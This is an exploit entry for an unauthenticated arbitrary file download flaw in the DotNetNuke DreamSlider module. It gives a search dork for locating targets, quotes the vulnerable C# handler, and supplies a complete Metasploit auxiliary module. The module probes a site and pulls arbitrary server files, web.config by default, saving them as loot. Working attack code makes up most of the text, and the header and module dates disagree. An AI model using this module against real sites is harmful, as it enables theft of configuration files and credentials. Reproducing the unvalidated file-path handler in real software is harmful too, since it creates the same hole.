1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131 | # Exploit Title: DotNetNuke DreamSlider Arbitrary File Download
# Date: 23/01/2014
# Author: Glafkos Charalambous
# Version: 01.01.02
# Vendor: DreamSlider
# Vendor URL: http://www.dreamslider.com/
# Google Dork: inurl:/DesktopModules/DreamSlider/
# CVE:
#
# Description
# DotNetNuke DreamSlider Module prior to version X suffer from a remote unauthenticated arbitrary file download vulnerability
#
# Vulnerable Code
#
# namespace DotNetNuke.Modules.DreamSlider
# {
# using System;
# using System.IO;
# using System.Web.SessionState;
# using System.Web.UI;
#
# public class DownloadProvider : Page, IRequiresSessionState
# {
# protected void Page_Load(object sender, EventArgs e)
# {
# if (!base.IsPostBack && (base.Request.QueryString["File"] != null))
# {
# string path = base.Request.QueryString["File"];
# string fileName = Path.GetFileName(path);
# base.Response.ContentType = "application/octet-stream";
# base.Response.AddHeader("Content-Disposition", "attachment; filename=" + fileName);
# base.Response.WriteFile(path);
# base.Response.End();
# }
# }
# }
# }
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
Rank = ExcellentRanking
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'DotNetNuke DreamSlider Arbitrary File Download',
'Description' => %q{
This module exploits an unauthenticated arbitrary file download vulnerability in DNN
DreamSlider version 01.01.02 and below.
},
'Author' =>
[
'Glafkos Charalambous', # Discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://metasploit.com' ]
],
'DisclosureDate' => 'Mar 23 2015'))
register_options(
[
Opt::RPORT(80),
OptString.new('FILENAME', [true, 'File to download', '~/web.config']),
OptString.new('PATH', [true, 'Path of DNN Nuke', '/']),
], self.class)
end
def check
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(datastore['PATH'],"/DesktopModules/DreamSlider/DownloadProvider.aspx"),
'cookie' => datastore['Cookie'],
})
if res && res.code == 200 and res.body.to_s =~ /Download Provider/
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
Exploit::CheckCode::Safe
end
end
def run
begin
print_status("#{peer} - Downloading file #{datastore['FILENAME']}")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(datastore['PATH'],"/DesktopModules/DreamSlider/DownloadProvider.aspx?File=") + datastore['FILENAME'],
'cookie' => datastore['Cookie'],
})
rescue Rex::ConnectionError
print_error("#{peer} - Could not connect.")
return
end
if res && res.code == 200
if res.body.to_s.bytesize == 0
print_error("#{peer} - 0 bytes returned, file does not exist or it is empty.")
return
end
fileName = datastore['FILENAME']
path = store_loot(
'ds.http',
'application/octet-stream',
datastore['RHOST'],
res.body,
fileName
)
print_good("#{peer} - File saved in: #{path}")
else
print_error("#{peer} - Failed to download file.")
end
end
end
|
